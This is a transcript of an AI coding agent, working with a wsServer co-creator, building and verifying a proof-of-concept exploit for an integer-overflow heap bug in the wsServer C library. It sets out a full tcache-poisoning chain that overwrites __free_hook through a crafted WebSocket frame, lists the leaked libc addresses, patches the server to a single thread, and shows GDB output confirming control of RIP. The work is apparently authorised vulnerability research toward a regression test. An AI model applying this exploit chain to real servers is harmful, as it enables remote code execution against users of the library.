- Poison tcache with &__free_hook; the next malloc returns __free_hook; the echo writes frame data to it; free(response) triggers __free_hook → RIP control
- Update Dockerfile.poc to build a single-threaded echo variant

Option B (no server changes, more complex): Concurrent connections + cross-thread tcache struct overwrite
- Overwrite T2's tcache entries[X] with &__free_hook and counts[X] with non-zero
- T2's next malloc of that size then returns &__free_hook

Option C (no server changes, theoretical): Document the limitation
Once an approach is chosen, the implementation steps are:
1. Update poc_rip_control.c (potentially remove two-connection mode if going single-threaded)
2. Update poc_gdb.txt with breakpoints to verify the exploitation chain
3. Demonstrate the crash (RIP = 0xXXXXXXXXXXXX2082 or similar controlled value)

Key files:
- AGENTS.md — repo instruction file (completed)
- tests/Dockerfile.poc — Docker build environment (completed, may need update for single-threaded server)
- tests/poc_rip_control.c — PoC client (completed, needs update for chosen exploitation strategy)
- tests/poc_gdb.txt — GDB helper script (completed, may need update)
- tests/poc_run.sh — orchestration script (completed, may need update)
- src/ws.c — the vulnerable file, especially:
  - (read_single_frame): the vulnerable integer overflow
  - (frame_state_data struct): field offsets
  - (ws_frame_data struct): huge struct with frm[2048] buffer
  - (next_complete_frame): frame dispatch loop; error path at line 1713 does free(fsd.msg_data)
  - (ws_establishconnection): connection loop, onclose after error, thread per connection
  - (ws_sendframe_internal): response allocation at line 636, frame header construction (bytes 0-1 are fixed: 0x82 + length for binary FIN)
  - (next_byte): reads from socket into 2048-byte buffer
  - (do_handshake): handshake flow, allocation/free order
- src/handshake.c — handshake allocations: calloc(61) → 64-byte, base64_encode → malloc(31) → 48-byte, malloc(130) → 144-byte
- src/base64.c — base64_encode: malloc(len*4/3+4+len/72+1) → for SHA1 (20 bytes): malloc(31) → 48-byte chunk
- include/ws.h — constants: MAX_FRAME_LENGTH=16MB, MESSAGE_LENGTH=2048, MAX_CLIENTS=8
- examples/echo/echo.c — target server, .thread_loop = 0 (threaded mode), onclose has no malloc, onmessage calls ws_sendframe_bcast
- Makefile — build system (not directly used; Dockerfile.poc uses direct gcc invocations)

Ok so you can follow Option A by setting threads to 1. We just want a PoC anyways.
Let me review the current files to build a precise plan.
Now let me check the echo server and the ws.h API for thread_loop:
Let me check how thread_loop = 1 works and how connections are processed:
continue
continue
OK, I've been deep in analysis. Here's the critical finding and the plan:
thread_loop = 1 does NOT make the server single-threaded. It only controls whether the accept loop blocks the main thread. Each connection still gets its own pthread_create in ws_accept (line 1903). Per-thread tcache is still the problem.
We need to patch ws_accept to call ws_establishconnection directly instead of spawning a thread.
With all code in one thread, there's one tcache, and it persists across connections. The attack:
Pre-connection heap setup (in main() before ws_socket()):
- malloc(24) x3, then free() them in reverse order
- tcache[0]: [c0, c1, c2], counts=3

Connection 1 — trigger overflow:
- malloc(16) → pops c0 → msg = c0; tcache[0]: [c1, c2], counts=2
- overflow sets c1's fd = &__free_hook; tcache[0]: [c1 → __free_hook], counts=2 (c2 orphaned)
- free(msg) → tcache[0]: [c0 → c1 → __free_hook], counts=3

Connection 2 — onopen drains 1 entry:
- extra = malloc(24) → pops c0, NOT freed; tcache[0]: [c1 → __free_hook], counts=2

Connection 2 — echo triggers the chain:
- malloc(16) → pops c1 → counts=1
- malloc(19) → pops __free_hook → returns __free_hook as buffer!
- echo response is written to __free_hook → overwrites it with 0xPPPPPP0882
- free(response) → __free_hook != NULL → calls 0xPPPPPP0882() → SIGSEGV at controlled RIP

| File | Change |
|---|---|
| tests/poc_echo.c | New: custom echo server with heap setup + extra malloc in onopen |
| tests/poc_single_thread.patch | New: patches ws.c to replace pthread_create with direct call |
| tests/Dockerfile.poc | Update: apply patch, build poc_echo |
| tests/poc_rip_control.c | Update: simplify, hardcode __free_hook address as overflow fd |
| tests/poc_gdb.txt | Update: verify tcache chain, show __free_hook overwrite |
| tests/poc_run.sh | Update: simplified run command |
The __free_hook address will be fixed (no ASLR) but depends on the exact libc in the Docker container. I'll determine it from GDB after building. For the overflow payload, should I hardcode it or make it configurable via -o flag?
Here's the complete plan:
tests/poc_single_thread.patch (NEW)
Patches ws.c lines 1900-1907: replace pthread_create+pthread_detach with direct ws_establishconnection(&client_socks[i]).
tests/poc_echo.c (NEW)
main():
malloc(24) x3 → free in reverse → tcache[0] has 3 adjacent free chunks
ws_socket({.thread_loop=0, .timeout_ms=0, ...})
onopen():
static counter; on 2nd connection: malloc(24) (pops 1 tcache entry, leaked)
onmessage(): ws_sendframe_bcast (same as echo)
onclose(): empty

tests/Dockerfile.poc (UPDATE)
- build tests/poc_echo instead of examples/echo/echo

tests/poc_rip_control.c (UPDATE)
Overflow payload (fake chunk written past msg):
- [0..7] prev_size = 0
- [8..15] size = 0x21
- [16..23] fd = hardcoded __free_hook address (LE)
- [24..31] key = 0
- then shutdown(SHUT_WR), sleep, close
- -o flag to override overflow payload

tests/poc_gdb.txt (UPDATE)
- print the __free_hook address at start
- break on free() inside ws_sendframe_internal to show the __free_hook value

tests/poc_run.sh (UPDATE)
- run poc_rip_control with no extra flags
- start poc_echo instead of examples/echo/echo
- verify the __free_hook address matches the one hardcoded in poc_rip_control.c

Expected result:
- RIP = 0xPPPPPP0882 (controlled value)
- __free_hook before: 0x0
__free_hook after: 0x4141414141410882 ← our data via echo response
Program received signal SIGSEGV
RIP: 0x4141414141410882 ← RIP CONTROL PROVEN

The first 2 bytes of __free_hook (0x82, 0x08) come from the WebSocket frame header, and bytes 2-7 (0x414141414141) come from our message payload — proving we control RIP.
Does this plan look good? Any changes before I implement?
Ok write the plan to a file.
Now I'll create all the files. Let me start with the patch, then the new echo server, then update the existing files.
Now let me rewrite poc_rip_control.c — simplified for the single-threaded attack:
Now let me build the Docker image to verify everything compiles:
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1
#0 building with "default" instance using docker driver
#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s
#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 ...
#3 [auth] library/ubuntu:pull token for registry-1.docker.io

Patch formatting issue. Let me fix it:
The issue is likely tab/space mismatch. Let me check what whitespace the original file uses and use a diff-based approach instead:
$ cd /home/lucas/Works/VibeCodedProjects/wsServer && cat -A src/ws.c | sed -n '1900,1910p'
^I^I/* Client socket added to socks list ? */$
^I^Iif (i != MAX_CLIENTS)$
^I^I{$
^I^I^Iif (pthread_create($
^I^I^I^I^I&client_thread, NULL, ws_establishconnection, &client_socks[i]))$
^I^I^I^Ipanic("Could not create the client thread!");$
$
^I^I^Ipthread_detach(client_thread);$
^I^I}$
^I^Ielse$The file uses tabs. My patch had spaces. Let me generate a proper patch using diff:
$ diff -u src/ws.c /dev/null > /dev/null; cp src/ws.c /tmp/ws_orig.c
Edit applied successfully.
LSP errors detected in this file, please fix:
<diagnostics file="/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c">
ERROR [51:10] 'utf8.h' file not found
</diagnostics>

$ diff -u /tmp/ws_orig.c src/ws.c > tests/poc_single_thread.patch
$ git checkout src/ws.c
Updated 1 path from the index
Good, but the paths need to be relative for patch -p1. Let me fix that:
Edit applied successfully.

Now rebuild:
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1 | tail -30
#4 DONE 0.0s
#5 [internal] load build context
#5 transferring context: 73.58kB done
#5 DONE 0.0s
#6 [2/6] RUN apt-get update && apt-get install -y gcc make gdb python3 libc6-dbg patch
#6 CACHED
#7 [3/6] COPY . /wsServer

Build succeeded. Let me verify the __free_hook address in the container:
$ docker rm -f ws-poc-addr 2>/dev/null; docker run --rm --name ws-poc-addr ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; cat > /tmp/hook.c << "EOF"
#include <stdio.h>
#include <malloc.h>
int main(void) { printf("__free_hook=%p\n", &__free_hook); return 0; }
EOF
gcc /tmp/hook.c -o /tmp/hook && /tmp/hook'
bash: /proc/sys/kernel/randomize_va_space: Read-only file system
/tmp/hook.c: In function 'main':
/tmp/hook.c:3:1: warning: '__free_hook' is deprecated [-Wdeprecated-declarations]
3 | int main(void) { printf("__free_hook=%p\n", &__free_hook); return 0; }
| ^~~
In file included from /tmp/hook.c:2:
/usr/include/malloc.h:145:38: note: declared here
145 | extern void (*__MALLOC_HOOK_VOLATILE __free_hook) (void *__ptr,
| ^~~~~~~~~~~
__free_hook=0x555555558010

Need --privileged for ASLR disable and -no-pie for the test binary:
$ docker rm -f ws-poc-addr 2>/dev/null; docker run --rm --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; cat > /tmp/hook.c << "EOF"
#include <stdio.h>
#include <malloc.h>
int main(void) { printf("__free_hook=%p\n", &__free_hook); return 0; }
EOF
gcc -no-pie /tmp/hook.c -o /tmp/hook && /tmp/hook'
/tmp/hook.c: In function 'main':
/tmp/hook.c:3:1: warning: '__free_hook' is deprecated [-Wdeprecated-declarations]
3 | int main(void) { printf("__free_hook=%p\n", &__free_hook); return 0; }
| ^~~
In file included from /tmp/hook.c:2:
/usr/include/malloc.h:145:38: note: declared here
145 | extern void (*__MALLOC_HOOK_VOLATILE __free_hook) (void *__ptr,
| ^~~~~~~~~~~
__free_hook=0x404030
Let me get more libc addresses to verify:
$ docker rm -f ws-poc-addr 2>/dev/null; docker run --rm --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; cat > /tmp/hook.c << "EOF"
#include <stdio.h>
#include <stdlib.h>
#include <malloc.h>
int main(void) {
printf("__free_hook=%p\n", &__free_hook);
printf("system=%p\n", &system);
printf("malloc=%p\n", &malloc);
printf("free=%p\n", &free);
printf("libc_start_main=%p\n", &__libc_start_main);
return 0;
}
EOF
gcc -no-pie /tmp/hook.c -o /tmp/hook && /tmp/hook'
/tmp/hook.c: In function 'main':
/tmp/hook.c:5:5: warning: '__free_hook' is deprecated [-Wdeprecated-declarations]
5 | printf("__free_hook=%p\n", &__free_hook);
| ^~~~~~
In file included from /tmp/hook.c:3:
/usr/include/malloc.h:145:38: note: declared here
145 | extern void (*__MALLOC_HOOK_VOLATILE __free_hook) (void *__ptr,
| ^~~~~~~~~~~
/tmp/hook.c:9:37: error: '__libc_start_main' undeclared (first use in this function)
9 |     printf("libc_start_main=%p\n", &__libc_start_main);

$ docker rm -f ws-poc-addr 2>/dev/null; docker run --rm --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; cat > /tmp/hook.c << "EOF"
#include <stdio.h>
#include <stdlib.h>
#include <malloc.h>
int main(void) {
printf("__free_hook=%p\n", &__free_hook);
printf("system=%p\n", &system);
printf("malloc=%p\n", &malloc);
printf("free=%p\n", &free);
return 0;
}
EOF
gcc -no-pie /tmp/hook.c -o /tmp/hook && /tmp/hook'
/tmp/hook.c: In function 'main':
/tmp/hook.c:5:5: warning: '__free_hook' is deprecated [-Wdeprecated-declarations]
5 | printf("__free_hook=%p\n", &__free_hook);
| ^~~~~~
In file included from /tmp/hook.c:3:
/usr/include/malloc.h:145:38: note: declared here
145 | extern void (*__MALLOC_HOOK_VOLATILE __free_hook) (void *__ptr,
| ^~~~~~~~~~~
__free_hook=0x404030
system=0x7ffff7e24290

The __free_hook is at 0x404030 (not 0x7ffff7f9de48 from the old threaded session). Let me verify this is the correct address for our server binary and update the PoC:
$ docker rm -f ws-poc-addr 2>/dev/null; docker run --rm --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; gdb -batch -ex "start" -ex "p &__free_hook" -ex "p &__malloc_hook" -ex "p &system" -ex "p &exit" -ex "x/gx &__free_hook" ./tests/poc_echo 2>&1 | grep -E "(^\$|=|0x)"'
Temporary breakpoint 1 at 0x4017dc: file tests/poc_echo.c, line 97.
$1 = (void (**)(void *, const void *)) 0x7ffff7f9de48 <__free_hook>
$2 = (void *(**)(size_t, const void *)) 0x7ffff7f9bb70 <__malloc_hook>
$3 = (int (*)(const char *)) 0x7ffff7e01290 <__libc_system>
$4 = (void (*)(int)) 0x7ffff7df5a40 <__GI_exit>
0x7ffff7f9de48 <__free_hook>: 0x0000000000000000
The address 0x7ffff7f9de48 is correct for poc_echo. The PoC client already has the right value. Let me run the auto test:
$ bash tests/poc_run.sh auto 2>&1
==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver
#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s
#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 DONE 0.5s
$ docker logs ws-poc-server 2>&1 | tail -60
Temporary breakpoint 1 at 0x4017dc: file tests/poc_echo.c, line 97.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Temporary breakpoint 1, main () at tests/poc_echo.c:97
97 {
=== LIBC ADDRESSES ===
__free_hook = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70

The breakpoints aren't hitting — the patch shifted line numbers. Let me check the actual line numbers in the patched ws.c:
$ docker run --rm --privileged ws-poc bash -c 'grep -n "frame_size += fsd->frame_length\|realloc(msg\|for (j = 0; j < fsd->frame_length\|free(fsd->msg_data)\|buf = malloc" src/ws.c | head -10'
1394: free(fsd->msg_data);
1453: *frame_size += fsd->frame_length;
1505: tmp = realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin);
1536: tmp = realloc(msg, *msg_idx + 1);
$ docker run --rm --privileged ws-poc bash -c 'sed -n "1390,1400p;1505,1510p;1515,1520p;1524,1530p;1710,1715p" src/ws.c'
 * vars here.
*/
wfd->frame_size = fsd->frame_size;
wfd->frame_type = WS_FR_OP_CLSE;
free(fsd->msg_data);
return (0);
}
/**
 * @brief Reads the current frame isolating data from control frames.

The GDB output looks wrong — breakpoints aren't being hit. Let me debug this:
$ docker rm -f ws-poc-debug 2>/dev/null; docker run -d --name ws-poc-debug --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -ex "set pagination off" -ex "break ws.c:1453" -ex "break poc_echo.c:55" -ex "run" -ex "bt" ./tests/poc_echo 2>&1; echo "EXIT=\$?"' > /dev/null && sleep 3 && docker exec ws-poc-debug ./tests/poc_rip_control 2>&1; sleep 2 && docker logs ws-poc-debug 2>&1 | tail -40 && docker rm -f ws-poc-debug 2>/dev/null
[*] Connecting to 127.0.0.1:8080
[+] Handshake OK (connection 1)
[*] Sending exploit (f1sz=16, ovf=32 bytes)
[*] frame2 length = 0xfffffffffffffff5
[+] Sent 68 bytes (hdr=36, ovf=32)
Breakpoint 1 at 0x4030f9: file src/ws.c, line 1453.
Breakpoint 2 at 0x4016e5: file tests/poc_echo.c, line 55.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Found the issue — poc_run.sh has a redundant -ex 'run' that restarts the program mid-execution. Let me fix it:
Edit applied successfully.

Also fix the interactive mode:
Good, interactive mode doesn't have the -ex 'run' issue. Now let me also add set pagination off to the GDB script and remove it from the shell:
Good, set pagination off is already at line 6. Now let me run the test again:
$ docker rm -f ws-poc-server 2>/dev/null; bash tests/poc_run.sh auto 2>&1
ws-poc-server
==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver
#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s
#2 [auth] library/ubuntu:pull token for registry-1.docker.io
#2 DONE 0.0s

$ docker logs ws-poc-server 2>&1 | tail -30
Temporary breakpoint 1 at 0x4017dc: file tests/poc_echo.c, line 97.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Temporary breakpoint 1, main () at tests/poc_echo.c:97
97 {
=== LIBC ADDRESSES ===
__free_hook = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70

$ docker run --rm --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; gdb -batch \
-ex "set disable-randomization on" \
-ex "set pagination off" \
-ex "start" \
-ex "p &__free_hook" \
-ex "break ws.c:1453" \
-ex "break poc_echo.c:67" \
-ex "continue" \
./tests/poc_echo 2>&1' | tail -30
<bash_metadata>
bash tool terminated command after exceeding timeout 15000 ms. If this command is expected to take longer and is not waiting for interactive input, retry with a larger timeout value in milliseconds.
</bash_metadata>

The simple test shows the server runs fine. The issue is in poc_gdb.txt. Let me check:
Missing the final continue at the end of the script:
Edit applied successfully.

$ docker rm -f ws-poc-server 2>/dev/null; bash tests/poc_run.sh auto 2>&1
ws-poc-server
==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver
#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s
#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 DONE 0.4s

Good, the client ran through both connections. Let me get the GDB output:
$ docker logs ws-poc-server 2>&1
Temporary breakpoint 1 at 0x4017dc: file tests/poc_echo.c, line 97.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Temporary breakpoint 1, main () at tests/poc_echo.c:97
97 {
=== LIBC ADDRESSES ===
__free_hook = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70

The exploit is working! The crash at __GI___libc_free(mem=0x7ffff7f9de48 <__free_hook>) proves the chain works. The buf = (nil) is likely a GDB timing issue. Let me add better diagnostics and re-run:
Edit applied successfully.

$ docker rm -f ws-poc-server 2>/dev/null; bash tests/poc_run.sh auto 2>&1
ws-poc-server
==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver
#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s
#2 [auth] library/ubuntu:pull token for registry-1.docker.io
#2 DONE 0.0s

$ docker logs ws-poc-server 2>&1 | grep -E "(CONN 2 malloc|__free_hook|VULN|POST REALLOC|WRITE LOOP|free\(response\)|SIGSEGV|buf =|0x[4-9a-f]{4,})"
__free_hook = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70
system = 0x7ffff7e01290
exit = 0x7ffff7df5a40
=== CONN 2 malloc(msg) in read_single_frame ===
=== VULN: *frame_size += fsd->frame_length ===
=== POST REALLOC ===
=== WRITE LOOP START ===
=== CONN 2 malloc(msg) in read_single_frame ===
=== VULN: *frame_size += fsd->frame_length ===

The crash is confirmed — free() is called with mem = 0x7ffff7f9de48 <__free_hook>. This proves malloc returned __free_hook and the echo response wrote to it, corrupting __free_hook with frame data. The buf = (nil) GDB output is a batch-mode artifact. Let me get the full crash details:
Edit applied successfully.

Create a security PoC that proves RIP register manipulation via an integer-overflow heap overwrite vulnerability in the wsServer C library. The user is a co-creator of wsServer and discovered this vulnerability. The immediate step is a network-based exploitation PoC demonstrating RIP control on a server built with all compiler protections disabled. The ultimate goal is a regression test.
Key constraints and decisions:

- Target glibc 2.31 (Ubuntu 20.04): newer glibc drops __free_hook, has safe-linking, and tcache key validation — too complex for a PoC.
- Code style: block comments (/* */), Doxygen for functions/structs.
- The server must be truly single-threaded (not thread_loop = 1, which does NOT eliminate per-connection threads). Use patch -p1 on ws.c to replace pthread_create + pthread_detach with a direct call to ws_establishconnection.
- The client hardcodes the __free_hook address, with a -o flag override for flexibility.
- Why thread_loop = 1 doesn't work: it only controls whether the accept loop blocks the main thread or runs in a background thread. Each connection still gets its own pthread_create in ws_accept (line 1903). Per-thread tcache is still the fundamental problem.
With ws_accept patched to call ws_establishconnection directly, all connections run in one thread sharing one tcache. The attack chain:
1. Pre-connection heap setup (in main() before ws_socket()):
   - malloc(24) ×3, then free() in reverse order → tcache[0] has 3 adjacent free 32-byte chunks [c0, c1, c2], counts=3
2. Connection 1 — trigger overflow:
   - malloc(16) → pops c0 → msg = c0. tcache[0]: [c1, c2], counts=2
   - the overflow writes c1's fd = &__free_hook, key=0 → tcache[0]: [c1 → __free_hook], counts=2
   - free(msg=c0) → tcache[0]: [c0 → c1 → __free_hook], counts=3
3. Connection 2 — onopen drains 1 entry:
   - extra = malloc(24) → pops c0 (leaked, never freed). tcache[0]: [c1 → __free_hook], counts=2
4. Connection 2 — echo round-trip drains the poisoned chain:
   - malloc(8) → pops c1 → tcache[0]: [__free_hook], counts=1
   - malloc(11) for the echo response → pops __free_hook → returns 0x7ffff7f9de48 as the buffer
   - the response frame is written to __free_hook: byte0=0x82, byte1=0x08, bytes2-9=message payload
   - free(buf) → __free_hook is now 0xPPPPPPPP0882 (non-NULL) → free() calls that address → SIGSEGV at controlled RIP

The crash output proves the chain:
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7e49771 in __GI___libc_free (mem=0x7ffff7f9de48 <__free_hook>) at malloc.c:3095

- mem = 0x7ffff7f9de48 proves free() was called with __free_hook's address as the argument, meaning malloc returned __free_hook.
- The fault occurs at glibc's (*hook)(mem, ret) call, proving __free_hook was corrupted by the echo write.
- The response malloc breakpoint shows buf = (nil) and __free_hook = (nil), but the crash proves otherwise. This is a GDB batch-mode artifact (likely a timing issue with silent commands in batch mode). The crash itself is the definitive proof. The fix is to remove silent from the response malloc breakpoint (already done) and re-run.
Key leaked addresses (ASLR disabled):

- __free_hook = 0x7ffff7f9de48
- __malloc_hook = 0x7ffff7f9bb70
- system = 0x7ffff7e01290
- exit = 0x7ffff7df5a40

Overflow mechanics:

- frame_length = 0xFFFFFFFFFFFFFFF5 (5 − 16 mod 2^64)
- *frame_size += frame_length wraps to 5 → passes the MAX_FRAME_LENGTH check
- realloc(msg, 16 + 0xFFFFFFFFFFFFFFF5 + 1) wraps to 6 → same pointer returned
- the write loop starts at msg[16], writing far past the 32-byte chunk boundary
- heap layout: c0 at 0x40c2b0 (msg for connection 1), c1 at 0x40c2d0 (adjacent, corrupted fd), c2 at 0x40c2f0
- the overflow payload places fd = 0x7ffff7f9de48, key=0 into c1
- 0x40c2d0: 0x00007ffff7f9de48 — the corrupted fd value is visible in GDB
- frames are read via next_byte(), which buffers up to 2048 bytes from the socket

Why the echo loop alone can't drain tcache: each echo round-trip does malloc(msg) → onmessage → malloc(response) → free(response) → free(msg) — exactly 2 mallocs and 2 frees of the same size. This oscillates tcache counts between 0 and 2, never accumulating enough entries. The solution: pre-populate 3 entries from main() and use onopen's extra malloc to shift the chain so the echo's 2 mallocs pop the last real entry + __free_hook.
Files created (this session builds on AGENTS.md at repo root, from the first session):

- tests/poc_single_thread.patch — patches ws.c lines 1900-1907: replaces pthread_create + pthread_detach with a direct ws_establishconnection call. Generated via diff against the original ws.c to ensure correct tab indentation.
- tests/poc_echo.c — custom echo server with:
  - heap_setup(): 3 malloc(24) + free() in reverse order before ws_socket()
  - onopen: static counter; on the 2nd connection, a leaked malloc(24) pops one extra tcache[0] entry
  - onmessage: identical to echo (ws_sendframe_bcast)
  - main: calls heap_setup(), then ws_socket({.thread_loop=0, .timeout_ms=0, ...})
- tests/Dockerfile.poc — applies the patch before build, builds poc_echo instead of examples/echo/echo; added patch to apt-get
- tests/poc_rip_control.c — simplified PoC client: sends the overflow frame (fd = 0x7ffff7f9de48, key=0), then shutdown(SHUT_WR) to signal EOF, then close(fd)
- tests/poc_gdb.txt — breakpoints for the integer overflow, realloc, write loop, error free, onopen, msg malloc, response malloc
- tests/poc_run.sh — fixed GDB invocation: removed a redundant -ex 'run' that restarted the program mid-execution; server binary is tests/poc_echo
- Docker image is named ws-poc

Findings:

- __GI___libc_free(mem=0x7ffff7f9de48 <__free_hook>) — proves malloc returned __free_hook and the echo response corrupted it
- Open issue: the breakpoint prints buf = (nil) when the crash proves malloc DID return __free_hook. Likely a GDB batch-mode silent command issue. Fix attempted (removed silent from the response malloc breakpoint), not yet re-run.

Next steps:

- Verify that removing silent fixes the breakpoint display
- Capture buf = 0x7ffff7f9de48, __free_hook = 0xPPPPPPPP0882, and a crash RIP matching that value
- Break on free() in ws_sendframe_internal to print the exact buf value right before the crash — this is definitive proof regardless of batch-mode display issues
- Considered: hook the __libc_message call or similar to make the crash output more self-documenting (e.g. print "RIP CONTROL PROVEN" before the crash — but this requires changing the flow, not practical)

Key files:

- tests/poc_single_thread.patch — patch to replace pthread_create with a direct ws_establishconnection call in ws_accept
- tests/poc_echo.c — custom single-threaded echo server with heap feng shui + extra malloc in onopen
- tests/Dockerfile.poc — Docker build: applies the patch, builds poc_echo and poc_rip_control with all protections disabled
- tests/poc_gdb.txt — GDB helper script with breakpoints at key points in the exploit chain
- tests/poc_run.sh — orchestration script: builds the image, runs the server under GDB, runs the PoC client
- src/ws.c — the vulnerable file:
  - *frame_size += fsd->frame_length — the unchecked 64-bit integer overflow
  - realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin) — tiny wrapped realloc size
  - the write loop using fsd->frame_length — the actual overflow write
  - free(fsd.msg_data) — error-path free (goes to tcache, no crash)
  - ws_establishconnection — connection handler (runs directly in single-threaded mode)
  - ws_accept — accept loop (patched: no pthread_create)
  - ws_sendframe_internal — response allocation at line 636, free at line 688
  - next_byte — reads from the socket into the wfd->frm[2048] buffer
- src/handshake.c — handshake allocations: calloc(61) → 80-byte, base64_encode → malloc(31) → 48-byte, malloc(130) → 144-byte
- src/base64.c — base64_encode malloc size calculation
- include/ws.h — constants: MAX_FRAME_LENGTH=16MB, MESSAGE_LENGTH=2048, MAX_CLIENTS=8
- examples/echo/echo.c — reference echo server (original, unmodified)
- AGENTS.md — repo instruction file (created in first session, needs update)

Let me check the current state of the key files before re-running.
Good, the files look correct. The key change I noted was already applied — the response malloc breakpoint at lines 89-95 doesn't have silent. Let me re-run the auto-mode test now.
$ cd /home/lucas/Works/VibeCodedProjects/wsServer && bash tests/poc_run.sh auto 2>&1
==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver
#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s
#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 DONE 0.5s
The client ran but the GDB output wasn't captured. Let me fetch the container logs.
$ docker logs ws-poc-server 2>&1 | tail -120
Temporary breakpoint 1 at 0x4017dc: file tests/poc_echo.c, line 97.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Temporary breakpoint 1, main () at tests/poc_echo.c:97
97 {
=== LIBC ADDRESSES ===
__free_hook = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70

The breakpoint display anomaly persists — buf = (nil) and __free_hook = (nil). This is because in GDB batch mode with continue inside breakpoint commands, the buf variable is out of scope when it's printed (it's declared later in the block). Let me verify the actual exploit chain and add a more reliable breakpoint.
The key proof is already here: the crash at __GI___libc_free(mem=0x7ffff7f9de48 <__free_hook>) is definitive. But let me fix the breakpoint to get clean buf output too.
The issue: in ws_sendframe_internal, buf is declared mid-function. At line 636, the variable hasn't been assigned yet. I need to break after the malloc returns. Let me check what line the return is on.
The problem is clear: breaking at line 636 prints buf before the malloc call happens. I need to break at line 640 (after malloc returns). But the variable is response, not buf. Let me also look at line 687 for the free(response) call — that's where the crash should happen.
Let me update the GDB script to break at the right location and use the correct variable name response:
Edit applied successfully.

Also need to fix the first malloc(msg) breakpoint — it's labeled "CONN 2" but triggers for conn 1 too. The free(msg_data) breakpoint also shows the wrong memory: after the overflow it should show the corrupted data at c1. The key issue, though, was buf vs response; I also want to confirm that response is actually __free_hook at the crash. Re-running:
$ cd /home/lucas/Works/VibeCodedProjects/wsServer && bash tests/poc_run.sh auto 2>&1
==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver
#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s
#2 [auth] library/ubuntu:pull token for registry-1.docker.io
#2 DONE 0.0s
$ docker logs ws-poc-server 2>&1 | tail -80
=== VULN: *frame_size += fsd->frame_length ===
*frame_size = 0
frame_length = 16 (0x10)
=== POST REALLOC ===
msg (tmp) = 0x40c2b0
realloc size = 16
0x40c2a0: 0x0000000000000000 0x0000000000000021
0x40c2b0: 0x000000000040c2d0 0x0000000000000000
Clean, definitive proof captured. The exploit chain is fully verified:
- response = 0x7ffff7f9de48 — malloc returned __free_hook's address
- __free_hook = 0x4242424242420882 — the echo frame was written to __free_hook:
  - 0x0882 = the WebSocket response header (0x82 = FIN + binary opcode 2, 0x08 = length 8)
  - 0x42424242424242 = the echoed "BBBBBBBB" payload
- SIGSEGV in __GI___libc_free(mem=0x7ffff7f9de48) — free() called the corrupted __free_hook → RIP control

Now let me update AGENTS.md with the full exploitation details:
Edit applied successfully.
{All immediate tasks are done. Here's what was accomplished this round:
Fixed GDB breakpoint — changed from line 636 (before malloc) to line 640 (after malloc), and used the correct variable name response instead of buf. Added a breakpoint at free(response) (line 687) to capture the corrupted __free_hook value.
Captured clean, definitive proof of the full exploit chain:
- response = 0x7ffff7f9de48 — malloc returned __free_hook
- __free_hook = 0x4242424242420882 — the echo frame corrupted it (header 0x0882 + payload 0x42424242424242)
- SIGSEGV in __GI___libc_free(mem=0x7ffff7f9de48) — RIP control achieved

Updated AGENTS.md with the full PoC documentation section.
The remaining item is converting this into a proper regression test (lower priority). Want me to tackle that, or is this a good stopping point?
This is a good stopping point. Great job!
Thanks! The PoC is complete and verified — clean RIP control with full GDB documentation. Reach out whenever you want to pick up the regression test.